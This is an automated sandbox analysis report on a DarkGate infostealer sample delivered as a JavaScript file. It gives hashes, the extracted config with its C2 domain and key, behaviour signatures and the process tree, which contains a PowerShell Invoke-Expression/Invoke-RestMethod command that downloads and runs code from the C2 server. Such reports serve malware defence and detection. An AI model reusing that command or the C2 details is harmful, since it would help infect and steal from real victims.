Analysis

  • max time kernel
    185s
  • max time network
    249s
  • platform
    windows10-1703_x64
  • resource
    win10-20231023-en
  • resource tags

    arch:x64arch:x86image:win10-20231023-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16-11-2023 15:43

General

  • Target

    JNVEEN.js

  • Size

    237KB

  • MD5

    ea6fd6ca47514d9c632c119d73aef528

  • SHA1

    0d47cbd6d19a17a57077cbc0d0aa659865458672

  • SHA256

    c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde

  • SHA512

    e20079b69e82eb48222635ef03a6f935871ea69f6d7715401ac208bbbb33a5af7fcb8c6c745364b31c2ee07e3f4bf2e5e5c2d1ae6ae87b795fa23230ead290ec

  • SSDEEP

    6144:k7hgXeerjqlI2Iro+Qqn7hgXeerjqlI2Iro+JGxw:ehgSlI23W7hgSlI23Ct

Score
10/10

Malware Config

Extracted

Family

darkgate

Botnet

A11111

C2

http://faststroygo.com

Attributes
  • alternative_c2_port

    8080

  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_rawstub

    true

  • crypto_key

    sYEvPOjQglaHah

  • internal_mutex

    txtMut

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    4

  • rootkit

    true

  • startup_persistence

    true

  • username

    A11111

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 10 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\dwm.exe
    "dwm.exe"
    1⤵
      PID:980
    • C:\Windows\system32\fontdrvhost.exe
      "fontdrvhost.exe"
      1⤵
        PID:736
      • c:\windows\system32\taskhostw.exe
        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
        1⤵
          PID:2932
        • C:\Windows\system32\wbem\unsecapp.exe
          C:\Windows\system32\wbem\unsecapp.exe -Embedding
          1⤵
            PID:2260
          • C:\Windows\system32\wscript.exe
            wscript.exe C:\Users\Admin\AppData\Local\Temp\JNVEEN.js
            1⤵
            • Blocklisted process makes network request
            • Modifies system certificate store
            • Suspicious use of WriteProcessMemory
            PID:2212
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri "http://faststroygo.com:80/jsslatecqpa");
              2⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4244
              • C:\tepp\AutoIt3.exe
                "C:\tepp\AutoIt3.exe" latecqpa.au3
                3⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:3512

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Defense Evasion

          Subvert Trust Controls

          1
          T1553

          Install Root Certificate

          1
          T1553.004

          Modify Registry

          1
          T1112

          Discovery

          System Information Discovery

          2
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y3zct1iu.tyd.ps1
            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • C:\tepp\AutoIt3.exe
            Filesize

            872KB

            MD5

            c56b5f0201a3b3de53e561fe76912bfd

            SHA1

            2a4062e10a5de813f5688221dbeb3f3ff33eb417

            SHA256

            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

            SHA512

            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

          • C:\tepp\AutoIt3.exe
            Filesize

            872KB

            MD5

            c56b5f0201a3b3de53e561fe76912bfd

            SHA1

            2a4062e10a5de813f5688221dbeb3f3ff33eb417

            SHA256

            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

            SHA512

            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

          • C:\tepp\latecqpa.au3
            Filesize

            491KB

            MD5

            6696048e8c881d11d34693e7bd489914

            SHA1

            006775ec7d52759c9332fca82511f2393cca91a0

            SHA256

            c38255b259f5e552c33142d192afd438f824773dfcea4eb31c707ce86949464c

            SHA512

            5950ee2237918933c3b139161430f22952cf049e75c68cde7b8a94b708aba643d87b5e20cc156ae1cef9febf1b20d3e9dc4bf0360eccb413030dd2f1e0e1358a

          • memory/3512-82-0x0000000001A30000-0x0000000001E30000-memory.dmp
            Filesize

            4.0MB

          • memory/3512-83-0x0000000004B30000-0x0000000004CC5000-memory.dmp
            Filesize

            1.6MB

          • memory/3512-91-0x0000000004B30000-0x0000000004CC5000-memory.dmp
            Filesize

            1.6MB

          • memory/3512-90-0x0000000004B30000-0x0000000004CC5000-memory.dmp
            Filesize

            1.6MB

          • memory/3512-89-0x0000000004B30000-0x0000000004CC5000-memory.dmp
            Filesize

            1.6MB

          • memory/4244-16-0x000001EA69CB0000-0x000001EA69CC0000-memory.dmp
            Filesize

            64KB

          • memory/4244-54-0x000001EA69CB0000-0x000001EA69CC0000-memory.dmp
            Filesize

            64KB

          • memory/4244-55-0x000001EA69CB0000-0x000001EA69CC0000-memory.dmp
            Filesize

            64KB

          • memory/4244-17-0x000001EA69CB0000-0x000001EA69CC0000-memory.dmp
            Filesize

            64KB

          • memory/4244-20-0x000001EA69F40000-0x000001EA69FB6000-memory.dmp
            Filesize

            472KB

          • memory/4244-79-0x00007FFDC6ED0000-0x00007FFDC78BC000-memory.dmp
            Filesize

            9.9MB

          • memory/4244-14-0x000001EA69C80000-0x000001EA69CA2000-memory.dmp
            Filesize

            136KB

          • memory/4244-53-0x000001EA69CB0000-0x000001EA69CC0000-memory.dmp
            Filesize

            64KB

          • memory/4244-15-0x00007FFDC6ED0000-0x00007FFDC78BC000-memory.dmp
            Filesize

            9.9MB

          • memory/4244-52-0x00007FFDC6ED0000-0x00007FFDC78BC000-memory.dmp
            Filesize

            9.9MB

          • memory/4244-40-0x000001EA6A770000-0x000001EA6A932000-memory.dmp
            Filesize

            1.8MB

          • memory/4244-35-0x000001EA69CB0000-0x000001EA69CC0000-memory.dmp
            Filesize

            64KB